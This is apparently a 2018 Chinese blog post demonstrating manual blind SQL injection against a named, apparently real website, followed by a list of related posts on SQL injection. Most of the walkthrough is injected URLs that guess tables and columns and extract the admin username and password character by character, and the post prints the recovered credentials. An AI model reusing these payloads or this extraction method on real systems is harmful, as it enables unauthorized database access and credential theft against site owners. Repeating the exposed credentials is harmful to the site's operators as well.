实战演示手工SQL注入之半猜解查询

原创 2018年04月16日 21:37:58

第一步:判断环境,寻找注入点

确定注入点 : 
数字型:   用'号报错 就有注入的希望     或者 and 1=1  and 1=2 检测  一个正常 一个返回不正常 95%存在注入点用 




第二步:猜解表名:

and exists (select * from 表名),如果存在该表名,返回正常,不存在返回错误;


第三步:猜解字段

and exists (selsect 字段名 from 表名)



第四步:猜解字段长度(即猜解账号密码位数)

and (selsect top 1 len(字段名 )from 表名)>0(从0开始依次随意递增,直到页面显示不正常,最后用等=确定位数)


mysql测试失败,原因暂时不知;

第五步:折半法猜出--重要关键的一环      猜密码   =0
and (select top 1 asc(mid(字段,1,1)) from 表名)>0    

and(select top 1 asc(mid(admin_name,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,1,1))from admin)=97
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,2,1))from admin)=100
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,3,1))from admin)=109
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,4,1))from admin)=105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_name,5,1))from admin)=110

97,100,109,105,110     用户名:admin     密码:liuguoping


and(select top 1 asc(mid(admin_pass,1,1))from admin)>0

http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,1,1))from admin)=108
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,2,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,3,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,4,1))from admin)>103
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,5,1))from admin)>117
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,6,1))from admin)>111
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,7,1))from admin)>112
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,8,1))from admin)>105
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,9,1))from admin)>110
http://www.gzdongke.com/fagui/news.asp?id=1 and(select top 1 asc(mid(admin_pass,10,1))from admin)>103

108,105,117,103,117,111,112,105,110,103     



猜解第N位的ASCII码 >0取值从负数到正数都有可能,当然常见的密码都是数字加字母的组合,他们的ASCII值在0-128之间,将值替换为这之间的值,如果正确,则返回正常页面,如果不是责返回出错,将正确的ASCII码放入ASCII转换器中转成十进制字符将N分别替换为 1 2 3 4 ...     反复猜解即可得出字段每一个位数的值而得到密码 。

第六步:用工具转码工具,把ASCII转换成字符。 


SQL 注入防御在互联网企业中的实践

SQL 注入是一种流行 且危害极大的 web 攻击手法,长期占据 OWASP TOP10 首位。本课程主要讲解 SQL 注入攻击的原理和技术手法,并讲解在互联网企业中如何有效防御。
  • 2017年02月28日 17:26

手工注入猜解过程详解

1.猜解表名: http://xxx.com/test.asp?id=123 and (select count(*) from admin)>=0//猜解是否有表admin 2.猜解字段名: htt...
  • lizhengnanhua
  • lizhengnanhua
  • 2014-09-23 00:53:00
  • 3324

sql注入,手动猜表名字段名

方法从网上看来的,记下来以后看。 1,猜表名: abc.asp?id=12 and 0 错误结果显示米有User表。   abc.asp?id=12 and 0 加载。。。,说明存...
  • pigHead_chen
  • pigHead_chen
  • 2012-11-14 15:46:38
  • 5266

SQL注入--表的猜解

步骤 表名—>列名—>列长度—>具体值 例如:注入点 http://www.XX.com/index.asp?id=1 猜解表名:http://...
  • weixin_37224075
  • weixin_37224075
  • 2018-02-08 21:10:03
  • 74

SQL手工注入

折腾了两天终于对sql注入有基本的思路了,先从手工注入理解原理,后续再继续学习sqlmap,很大一部分前辈写的挺好的我就不重复了→→http://blog.csdn.net/emaste_r/arti...
  • specter11235
  • specter11235
  • 2017-05-08 21:51:47
  • 448

SQL手工注入基础详解---- Access篇

作者:DragonEgg 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/        复习了一下以前学习手工注入时做的笔记...
  • xabc3000
  • xabc3000
  • 2012-05-30 10:49:53
  • 13991

SQL手工注入基础详解----MSSQL篇

作者:DragonEgg 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/      一:注入点的判断      当我们在U...
  • xabc3000
  • xabc3000
  • 2012-05-30 10:47:36
  • 14738

SQL语句 注入猜解hack工具

  • 2010年08月30日 16:25
  • 50KB
  • 下载

MYSQL-手工SQL注入绕过技巧-实战篇

之前遇到一个站点,经检测存在SQL注入,但是有WAF存在,后来知道是绿盟的WEB应用防火墙。 后来在社区看到了一篇关于《sql注入绕过技巧》的文章后(原文:http://zone.wooyun....
  • eT48_sec
  • eT48_sec
  • 2014-12-24 15:09:28
  • 2977

MySQL 手工注入语句总结

sunzn:存查备用! 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5…….n/* 暴字段位置 and 1=2 union...
  • senlin1202
  • senlin1202
  • 2016-03-04 09:56:43
  • 4942
收藏助手
不良信息举报
您举报文章:实战演示手工SQL注入之半猜解查询
举报原因:
原因补充:

(最多只允许输入30个字)